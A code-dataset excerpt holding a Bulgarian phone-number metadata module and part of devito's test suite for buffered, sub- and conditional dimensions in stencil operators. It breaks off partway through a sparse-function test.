repo_name
stringlengths 5
104
| path
stringlengths 4
248
| content
stringlengths 102
99.9k
|
|---|---|---|
ayushgoel/FixGoogleContacts
|
phonenumbers/data/region_BG.py
|
"""Auto-generated file, do not edit by hand. BG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_BG = PhoneMetadata(id='BG', country_code=359, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[23567]\\d{5,7}|[489]\\d{6,8}', possible_number_pattern='\\d{5,9}'),
fixed_line=PhoneNumberDesc(national_number_pattern='2(?:[0-8]\\d{5,6}|9\\d{4,6})|(?:[36]\\d|5[1-9]|8[1-6]|9[1-7])\\d{5,6}|(?:4(?:[124-7]\\d|3[1-6])|7(?:0[1-9]|[1-9]\\d))\\d{4,5}', possible_number_pattern='\\d{5,8}', example_number='2123456'),
mobile=PhoneNumberDesc(national_number_pattern='(?:8[7-9]|98)\\d{7}|4(?:3[0789]|8\\d)\\d{5}', possible_number_pattern='\\d{8,9}', example_number='48123456'),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345'),
premium_rate=PhoneNumberDesc(national_number_pattern='90\\d{6}', possible_number_pattern='\\d{8}', example_number='90123456'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='700\\d{5}', possible_number_pattern='\\d{5,9}', example_number='70012345'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='1(?:12|50|6[06])', possible_number_pattern='\\d{3}', example_number='112'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(2)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['29'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(2)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})', format='\\1 \\2 \\3', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[78]00'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2,3})', format='\\1 \\2 \\3', leading_digits_pattern=['[356]|4[124-7]|7[1-9]|8[1-6]|9[1-7]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['48|8[7-9]|9[08]'], national_prefix_formatting_rule='0\\1')])
|
opesci/devito
|
tests/test_dimension.py
|
from itertools import product
import numpy as np
from sympy import And
import pytest
from conftest import skipif, opts_tiling
from devito import (ConditionalDimension, Grid, Function, TimeFunction, SparseFunction, # noqa
Eq, Operator, Constant, Dimension, SubDimension, switchconfig,
SubDomain, Lt, Le, Gt, Ge, Ne, Buffer)
from devito.ir.iet import (Conditional, Expression, Iteration, FindNodes,
retrieve_iteration_tree)
from devito.symbolics import indexify, retrieve_functions, IntDiv
from devito.types import Array
class TestBufferedDimension(object):
def test_multi_buffer(self):
grid = Grid((3, 3))
f = TimeFunction(name="f", grid=grid)
g = TimeFunction(name="g", grid=grid, save=Buffer(7))
op = Operator([Eq(f.forward, 1), Eq(g, f.forward)])
op(time_M=3)
# f looped all time_order buffer and is 1 everywhere
assert np.allclose(f.data, 1)
# g looped indices 0 to 3, rest is still 0
assert np.allclose(g.data[0:4], 1)
assert np.allclose(g.data[4:], 0)
def test_multi_buffer_long_time(self):
grid = Grid((3, 3))
time = grid.time_dim
f = TimeFunction(name="f", grid=grid)
g = TimeFunction(name="g", grid=grid, save=Buffer(7))
op = Operator([Eq(f.forward, time), Eq(g, time+1)])
op(time_M=20)
# f[0] is time=19, f[1] is time=20
assert np.allclose(f.data[0], 19)
assert np.allclose(f.data[1], 20)
# g is time 15 to 21 (loop twice the 7 buffer then 15->21)
for i in range(7):
assert np.allclose(g.data[i], 14+i+1)
class TestSubDimension(object):
@pytest.mark.parametrize('opt', opts_tiling)
def test_interior(self, opt):
"""
Tests application of an Operator consisting of a single equation
over the ``interior`` subdomain.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
interior = grid.interior
u = TimeFunction(name='u', grid=grid)
eqn = [Eq(u.forward, u + 2, subdomain=interior)]
op = Operator(eqn, opt=opt)
op.apply(time_M=2)
assert np.all(u.data[1, 1:-1, 1:-1, 1:-1] == 6.)
assert np.all(u.data[1, :, 0] == 0.)
assert np.all(u.data[1, :, -1] == 0.)
assert np.all(u.data[1, :, :, 0] == 0.)
assert np.all(u.data[1, :, :, -1] == 0.)
def test_domain_vs_interior(self):
"""
Tests application of an Operator consisting of two equations, one
over the whole domain (default), and one over the ``interior`` subdomain.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
t = grid.stepping_dim # noqa
interior = grid.interior
u = TimeFunction(name='u', grid=grid) # noqa
eqs = [Eq(u.forward, u + 1),
Eq(u.forward, u.forward + 2, subdomain=interior)]
op = Operator(eqs, opt='noop')
trees = retrieve_iteration_tree(op)
assert len(trees) == 2
op.apply(time_M=1)
assert np.all(u.data[1, 0, :, :] == 1)
assert np.all(u.data[1, -1, :, :] == 1)
assert np.all(u.data[1, :, 0, :] == 1)
assert np.all(u.data[1, :, -1, :] == 1)
assert np.all(u.data[1, :, :, 0] == 1)
assert np.all(u.data[1, :, :, -1] == 1)
assert np.all(u.data[1, 1:3, 1:3, 1:3] == 3)
@pytest.mark.parametrize('opt', opts_tiling)
def test_subdim_middle(self, opt):
"""
Tests that instantiating SubDimensions using the classmethod
constructors works correctly.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
t = grid.stepping_dim # noqa
u = TimeFunction(name='u', grid=grid) # noqa
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=1,
thickness_right=1)
eqs = [Eq(u.forward, u + 1)]
eqs = [e.subs(x, xi) for e in eqs]
op = Operator(eqs, opt=opt)
u.data[:] = 1.0
op.apply(time_M=1)
assert np.all(u.data[1, 0, :, :] == 1)
assert np.all(u.data[1, -1, :, :] == 1)
assert np.all(u.data[1, 1:3, :, :] == 2)
def test_symbolic_size(self):
"""Check the symbolic size of all possible SubDimensions is as expected."""
grid = Grid(shape=(4,))
x, = grid.dimensions
thickness = 4
xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
assert xleft.symbolic_size == xleft.thickness.left[0]
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
assert xi.symbolic_size == (x.symbolic_max - x.symbolic_min -
xi.thickness.left[0] - xi.thickness.right[0] + 1)
xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
assert xright.symbolic_size == xright.thickness.right[0]
@pytest.mark.parametrize('opt', opts_tiling)
def test_bcs(self, opt):
"""
Tests application of an Operator consisting of multiple equations
defined over different sub-regions, explicitly created through the
use of SubDimensions.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
t_in_centre = Eq(u[t+1, xi, yi], 1)
leftbc = Eq(u[t+1, xleft, yi], u[t+1, xleft+1, yi] + 1)
rightbc = Eq(u[t+1, xright, yi], u[t+1, xright-1, yi] + 1)
op = Operator([t_in_centre, leftbc, rightbc], opt=opt)
op.apply(time_m=1, time_M=1)
assert np.all(u.data[0, :, 0:thickness] == 0.)
assert np.all(u.data[0, :, -thickness:] == 0.)
assert all(np.all(u.data[0, i, thickness:-thickness] == (thickness+1-i))
for i in range(thickness))
assert all(np.all(u.data[0, -i, thickness:-thickness] == (thickness+2-i))
for i in range(1, thickness + 1))
assert np.all(u.data[0, thickness:-thickness, thickness:-thickness] == 1.)
def test_flow_detection_interior(self):
"""
Test detection of flow directions when SubDimensions are used
(in this test they are induced by the ``interior`` subdomain).
Stencil uses values at new timestep as well as those at previous ones
This forces an evaluation order onto x.
Weights are:
x=0 x=1 x=2 x=3
t=N 2 ---3
v /
t=N+1 o--+----4
Flow dependency should traverse x in the negative direction
x=2 x=3 x=4 x=5 x=6
t=0 0 --- 0 -- 1 -- 0
v / v / v /
t=1 44 -+--- 11 -+--- 2--+ -- 0
"""
grid = Grid(shape=(10, 10))
x, y = grid.dimensions
interior = grid.interior
u = TimeFunction(name='u', grid=grid, save=10, time_order=1, space_order=0)
step = Eq(u.forward, 2*u
+ 3*u.subs(x, x+x.spacing)
+ 4*u.forward.subs(x, x+x.spacing),
subdomain=interior)
op = Operator(step)
u.data[0, 5, 5] = 1.0
op.apply(time_M=0)
assert u.data[1, 5, 5] == 2
assert u.data[1, 4, 5] == 11
assert u.data[1, 3, 5] == 44
assert u.data[1, 2, 5] == 4*44
assert u.data[1, 1, 5] == 4*4*44
# This point isn't updated because of the `interior` selection
assert u.data[1, 0, 5] == 0
assert np.all(u.data[1, 6:, :] == 0)
assert np.all(u.data[1, :, 0:5] == 0)
assert np.all(u.data[1, :, 6:] == 0)
@pytest.mark.parametrize('exprs,expected,', [
# Carried dependence in both /t/ and /x/
(['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y])'], 'y'),
(['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y], subdomain=interior)'], 'i0y'),
# Carried dependence in both /t/ and /y/
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y])'], 'x'),
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)'], 'i0x'),
# Carried dependence in /y/, leading to separate /y/ loops, one
# going forward, the other backward
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)',
'Eq(u[t+1, x, y], u[t+1, x, y+1] + u[t, x, y], subdomain=interior)'], 'i0x'),
])
def test_iteration_property_parallel(self, exprs, expected):
"""Tests detection of sequental and parallel Iterations when applying
equations over different subdomains."""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions # noqa
t = grid.time_dim # noqa
interior = grid.interior # noqa
u = TimeFunction(name='u', grid=grid, save=10, time_order=1) # noqa
# List comprehension would need explicit locals/globals mappings to eval
for i, e in enumerate(list(exprs)):
exprs[i] = eval(e)
op = Operator(exprs, opt='noop')
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Sequential for i in iterations if i.dim.name != expected)
assert all(i.is_Parallel for i in iterations if i.dim.name == expected)
@skipif(['device'])
@pytest.mark.parametrize('exprs,expected,', [
# All parallel, the innermost Iteration gets vectorized
(['Eq(u[time, x, yleft], u[time, x, yleft] + 1.)'], ['yleft']),
# All outers are parallel, carried dependence in `yleft`, so the middle
# Iteration over `x` gets vectorized
(['Eq(u[time, x, yleft], u[time, x, yleft+1] + 1.)'], ['x']),
# Only the middle Iteration is parallel, so no vectorization (the Iteration
# is left non-vectorised for OpenMP parallelism)
(['Eq(u[time+1, x, yleft], u[time, x, yleft+1] + u[time+1, x, yleft+1])'], [])
])
def test_iteration_property_vector(self, exprs, expected):
"""Tests detection of vector Iterations when using subdimensions."""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions # noqa
time = grid.time_dim # noqa
# The leftmost 10 elements
yleft = SubDimension.left(name='yleft', parent=y, thickness=10) # noqa
u = TimeFunction(name='u', grid=grid, save=10, time_order=0, space_order=1) # noqa
# List comprehension would need explicit locals/globals mappings to eval
for i, e in enumerate(list(exprs)):
exprs[i] = eval(e)
op = Operator(exprs, opt='simd')
iterations = FindNodes(Iteration).visit(op)
vectorized = [i.dim.name for i in iterations if i.is_Vectorized]
assert set(vectorized) == set(expected)
@pytest.mark.parametrize('opt', opts_tiling)
def test_subdimmiddle_parallel(self, opt):
"""
Tests application of an Operator consisting of a subdimension
defined over different sub-regions, explicitly created through the
use of SubDimensions.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# a 5 point stencil that can be computed in parallel
centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t, xi-1, yi]
+ u[t, xi+1, yi] + u[t, xi, yi-1] + u[t, xi, yi+1])
u.data[0, 10, 10] = 1.0
op = Operator([centre], opt=opt)
print(op.ccode)
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xi, yi])
op.apply(time_m=0, time_M=0)
assert np.all(u.data[1, 9:12, 10] == 1.0)
assert np.all(u.data[1, 10, 9:12] == 1.0)
# Other than those, it should all be 0
u.data[1, 9:12, 10] = 0.0
u.data[1, 10, 9:12] = 0.0
assert np.all(u.data[1, :] == 0)
def test_subdimleft_parallel(self):
"""
Tests application of an Operator consisting of a subdimension
defined over different sub-regions, explicitly created through the
use of SubDimensions.
This tests that flow direction is not being automatically inferred
from whether the subdimension is on the left or right boundary.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xl = SubDimension.left(name='xl', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# Can be done in parallel
eq = Eq(u[t+1, xl, yi], u[t, xl, yi] + 1)
op = Operator([eq])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xl, yi])
op.apply(time_m=0, time_M=0)
assert np.all(u.data[1, 0:thickness, 0:thickness] == 0)
assert np.all(u.data[1, 0:thickness, -thickness:] == 0)
assert np.all(u.data[1, 0:thickness, thickness:-thickness] == 1)
assert np.all(u.data[1, thickness+1:, :] == 0)
def test_subdimmiddle_notparallel(self):
"""
Tests application of an Operator consisting of a subdimension
defined over different sub-regions, explicitly created through the
use of SubDimensions.
Different from ``test_subdimmiddle_parallel`` because an interior
dimension cannot be evaluated in parallel.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# flow dependencies in x and y which should force serial execution
# in reverse direction
centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t+1, xi+1, yi+1])
u.data[0, 10, 10] = 1.0
op = Operator([centre])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xi)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)
op.apply(time_m=0, time_M=0)
for i in range(4, 11):
assert u.data[1, i, i] == 1.0
u.data[1, i, i] = 0.0
assert np.all(u.data[1, :] == 0)
def test_subdimleft_notparallel(self):
"""
Tests application of an Operator consisting of a subdimension
defined over different sub-regions, explicitly created through the
use of SubDimensions.
This tests that flow direction is not being automatically inferred
from whether the subdimension is on the left or right boundary.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=0)
xl = SubDimension.left(name='xl', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# Flows inward (i.e. forward) rather than outward
eq = Eq(u[t+1, xl, yi], u[t+1, xl-1, yi] + 1)
op = Operator([eq])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xl)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)
op.apply(time_m=1, time_M=1)
assert all(np.all(u.data[0, :thickness, thickness+i] == [1, 2, 3, 4])
for i in range(12))
assert np.all(u.data[0, thickness:] == 0)
assert np.all(u.data[0, :, thickness+12:] == 0)
def test_subdim_fd(self):
"""
Test that the FD shortcuts are handled correctly with SubDimensions
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=1)
u.data[:] = 2.
# Flows inward (i.e. forward) rather than outward
eq = [Eq(u.forward, u.dx + u.dy, subdomain=grid.interior)]
op = Operator(eq)
op.apply(time_M=0)
assert np.all(u.data[1, -1, :] == 2.)
assert np.all(u.data[1, :, 0] == 2.)
assert np.all(u.data[1, :, -1] == 2.)
assert np.all(u.data[1, 0, :] == 2.)
assert np.all(u.data[1, 1:18, 1:18] == 0.)
def test_arrays_defined_over_subdims(self):
"""
Check code generation when an Array uses a SubDimension.
"""
grid = Grid(shape=(3,))
x, = grid.dimensions
xi, = grid.interior.dimensions
f = Function(name='f', grid=grid)
a = Array(name='a', dimensions=(xi,), dtype=grid.dtype)
op = Operator([Eq(a[xi], 1), Eq(f, f + a[xi + 1], subdomain=grid.interior)],
openmp=False)
assert len(op.parameters) == 6
# neither `x_size` nor `xi_size` are expected here
assert not any(i.name in ('x_size', 'xi_size') for i in op.parameters)
# Try running it -- regardless of what it will produce, this should run
# ie, this checks this error isn't raised:
# "ValueError: No value found for parameter xi_size"
op()
@pytest.mark.parametrize('opt', opts_tiling)
def test_expandingbox_like(self, opt):
"""
Make sure SubDimensions aren't an obstacle to expanding boxes.
"""
grid = Grid(shape=(8, 8))
x, y = grid.dimensions
u = TimeFunction(name='u', grid=grid)
xi = SubDimension.middle(name='xi', parent=x, thickness_left=2, thickness_right=2)
yi = SubDimension.middle(name='yi', parent=y, thickness_left=2, thickness_right=2)
eqn = Eq(u.forward, u + 1)
eqn = eqn.subs({x: xi, y: yi})
op = Operator(eqn, opt=opt)
op.apply(time=3, x_m=2, x_M=5, y_m=2, y_M=5,
xi_ltkn=0, xi_rtkn=0, yi_ltkn=0, yi_rtkn=0)
assert np.all(u.data[0, 2:-2, 2:-2] == 4.)
assert np.all(u.data[1, 2:-2, 2:-2] == 3.)
assert np.all(u.data[:, :2] == 0.)
assert np.all(u.data[:, -2:] == 0.)
assert np.all(u.data[:, :, :2] == 0.)
assert np.all(u.data[:, :, -2:] == 0.)
class TestConditionalDimension(object):
"""
A collection of tests to check the correct functioning of ConditionalDimensions.
"""
def test_basic(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.), Eq(usave, u)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
def test_basic_shuffles(self):
"""
Like ``test_basic``, but with different equation orderings. Nevertheless,
we assert against the same exact values as in ``test_basic``, since we
save `u`, not `u.forward`.
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
# Shuffle 1
eqns = [Eq(usave, u), Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
# Shuffle 2
usave.data[:] = 0.
u.data[:] = 0.
u2.data[:] = 0.
eqns = [Eq(u.forward, u + 1.), Eq(usave, u), Eq(u2.forward, u2 + 1.)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
@pytest.mark.parametrize('opt', opts_tiling)
def test_spacial_subsampling(self, opt):
"""
Test conditional dimension for the spatial ones.
This test saves u every two grid points :
u2[x, y] = u[2*x, 2*y]
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid, save=nt)
assert(grid.time_dim in u.indices)
# Creates subsampled spatial dimensions and accordine grid
dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
for d in u.grid.dimensions])
grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
u2 = TimeFunction(name='u2', grid=grid2, save=nt)
assert(time in u2.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2, u)]
op = Operator(eqns, opt=opt)
op.apply(time_M=nt-2)
# Verify that u2[x,y]= u[2*x, 2*y]
assert np.allclose(u.data[:-1, 0::2, 0::2], u2.data[:-1, :, :])
def test_time_subsampling_fd(self):
nt = 19
grid = Grid(shape=(11, 11))
x, y = grid.dimensions
time = grid.time_dim
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled, time_order=2)
dx2 = [indexify(i) for i in retrieve_functions(usave.dt2.evaluate)]
assert dx2 == [usave[time_subsampled - 1, x, y],
usave[time_subsampled + 1, x, y],
usave[time_subsampled, x, y]]
def test_issue_1592(self):
grid = Grid(shape=(11, 11))
time = grid.time_dim
time_sub = ConditionalDimension('t_sub', parent=time, factor=2)
v = TimeFunction(name="v", grid=grid, space_order=4, time_dim=time_sub, save=5)
w = Function(name="w", grid=grid, space_order=4)
Operator(Eq(w, v.dx))(time=6)
op = Operator(Eq(v.forward, v.dx))
op.apply(time=6)
exprs = FindNodes(Expression).visit(op)
assert exprs[-1].expr.lhs.indices[0] == IntDiv(time, 2) + 1
def test_subsampled_fd(self):
"""
Test that the FD shortcuts are handled correctly with ConditionalDimensions
"""
grid = Grid(shape=(11, 11))
time = grid.time_dim
# Creates subsampled spatial dimensions and accordine grid
dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
for d in grid.dimensions])
grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
u2 = TimeFunction(name='u2', grid=grid2, space_order=2, time_order=1)
u2.data.fill(2.)
eqns = [Eq(u2.forward, u2.dx + u2.dy)]
op = Operator(eqns)
op.apply(time_M=0, x_M=11, y_M=11)
# Verify that u2 contains subsampled fd values
assert np.all(u2.data[0, :, :] == 2.)
assert np.all(u2.data[1, 0, 0] == 0.)
assert np.all(u2.data[1, -1, -1] == -20.)
assert np.all(u2.data[1, 0, -1] == -10.)
assert np.all(u2.data[1, -1, 0] == -10.)
assert np.all(u2.data[1, 1:-1, 0] == 0.)
assert np.all(u2.data[1, 0, 1:-1] == 0.)
assert np.all(u2.data[1, 1:-1, -1] == -10.)
assert np.all(u2.data[1, -1, 1:-1] == -10.)
assert np.all(u2.data[1, 1:4, 1:4] == 0.)
# This test generates an openmp loop form which makes older gccs upset
@switchconfig(openmp=False)
def test_nothing_in_negative(self):
"""Test the case where when the condition is false, there is nothing to do."""
nt = 4
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', save=nt, grid=grid)
assert(grid.time_dim in u.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(usave, u)]
op = Operator(eqns)
u.data[:] = 1.0
usave.data[:] = 0.0
op.apply(time_m=1, time_M=1)
assert np.allclose(usave.data, 0.0)
op.apply(time_m=0, time_M=0)
assert np.allclose(usave.data, 1.0)
def test_laplace(self):
grid = Grid(shape=(20, 20, 20))
x, y, z = grid.dimensions
time = grid.time_dim
t = grid.stepping_dim
tsave = ConditionalDimension(name='tsave', parent=time, factor=2)
u = TimeFunction(name='u', grid=grid, save=None, time_order=2)
usave = TimeFunction(name='usave', grid=grid, time_dim=tsave,
time_order=0, space_order=0)
steps = []
# save of snapshot
steps.append(Eq(usave, u))
# standard laplace-like thing
steps.append(Eq(u[t+1, x, y, z],
u[t, x, y, z] - u[t-1, x, y, z]
+ u[t, x-1, y, z] + u[t, x+1, y, z]
+ u[t, x, y-1, z] + u[t, x, y+1, z]
+ u[t, x, y, z-1] + u[t, x, y, z+1]))
op = Operator(steps)
u.data[:] = 0.0
u.data[0, 10, 10, 10] = 1.0
op.apply(time_m=0, time_M=0)
assert np.sum(u.data[0, :, :, :]) == 1.0
assert np.sum(u.data[1, :, :, :]) == 7.0
assert np.all(usave.data[0, :, :, :] == u.data[0, :, :, :])
def test_as_expr(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
Eq(usave, time_subsampled * u)]
op = Operator(eqns)
op.apply(t=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor*i)
for i in range((nt+factor-1)//factor)])
def test_shifted(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=2, time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
t_sub_shift = Constant(name='t_sub_shift', dtype=np.int32)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
Eq(usave.subs(time_subsampled, time_subsampled - t_sub_shift), u)]
op = Operator(eqns)
# Starting at time_m=10, so time_subsampled - t_sub_shift is in range
op.apply(time_m=10, time_M=nt-2, t_sub_shift=3)
assert np.all(np.allclose(u.data[0], 8))
assert np.all([np.allclose(u2.data[i], i - 10) for i in range(10, nt)])
assert np.all([np.allclose(usave.data[i], 2+i*factor) for i in range(2)])
def test_no_index(self):
"""Test behaviour when the ConditionalDimension is used as a symbol in
an expression."""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
v = Function(name='v', grid=grid)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
eqns = [Eq(u.forward, u + 1), Eq(v, v + u*u*time_subsampled)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
# expected result is 1024
# v = u[0]**2 * 0 + u[4]**2 * 1 + u[8]**2 * 2 + u[12]**2 * 3 + u[16]**2 * 4
# with u[t] = t
# v = 16 * 1 + 64 * 2 + 144 * 3 + 256 * 4 = 1600
assert np.all(np.allclose(v.data, 1600))
def test_no_index_sparse(self):
"""Test behaviour when the ConditionalDimension is used as a symbol in
an expression over sparse data objects."""
grid = Grid(shape=(4, 4), extent=(3.0, 3.0))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, save=1)
f.data[:] = 0.
coordinates = [(0.5, 0.5), (0.5, 2.5), (2.5, 0.5), (2.5, 2.5)]
sf = SparseFunction(name='sf', grid=grid, npoint=4, coordinates=coordinates)
sf.data[:] = 1.
sd = sf.dimensions[sf._sparse_position]
# We want to write to `f` through `sf` so that we obtain the
# following 4x4 grid (the '*' show the position of the sparse points)
# We do that by emulating an injection
#
# 0 --- 0 --- 0 --- 0
# | * | | * |
# 0 --- 1 --- 1 --- 0
# | | | |
# 0 --- 1 --- 1 --- 0
# | * | | * |
